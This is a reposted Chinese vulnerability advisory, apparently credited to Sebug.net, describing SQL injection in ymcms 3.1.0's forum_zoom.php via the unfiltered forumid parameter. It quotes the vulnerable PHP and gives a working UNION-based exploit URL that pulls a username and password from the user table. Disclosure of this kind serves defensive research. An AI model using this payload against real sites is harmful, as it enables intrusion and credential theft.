ymcms SQL注入漏洞
生活随笔
收集整理的这篇文章主要介绍了
ymcms SQL注入漏洞
小编觉得挺不错的,现在分享给大家,帮大家做个参考.
| 影响版本: ymcms3.1.0 |
| 详细说明: forum_zoom.php 31~48行 if ($forumid != ""){ $isforum = " && forumid IN (".$forumid.") "; }else{ $isforum = ""; } //forumid明显没有过滤 …… $sql = "Select threadid, title, lastpost FROM ".$ym_thread_tab." Where isshow="1" ".$isforum." orDER BY ".$isaction." LIMIT 0, ".$shownum; 发生了注射 |
| 参考: misssky's BLOG |
| 解决方案: http://www.ymcms.com/ |
| 测试方法: [警 告] 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负! exp:[union] forum_zoom.php?forumid=15)%20and%201=2%20union%20select%201,concat(username,0x3f,password),3%20from%20user%20where%20userid=1/* |
| //Sebug.net 本安全信息由Sebug.net翻译整理,版权所有,未经许可,不得转载 |
转载于:https://www.cnblogs.com/allyesno/archive/2007/08/05/843451.html
总结
以上是生活随笔为你收集整理的ymcms SQL注入漏洞的全部内容,希望文章能够帮你解决所遇到的问题。
- 上一篇: 如何在服务器端写关闭窗口的代码?同时能够
- 下一篇: SQL Server 2005:你应该知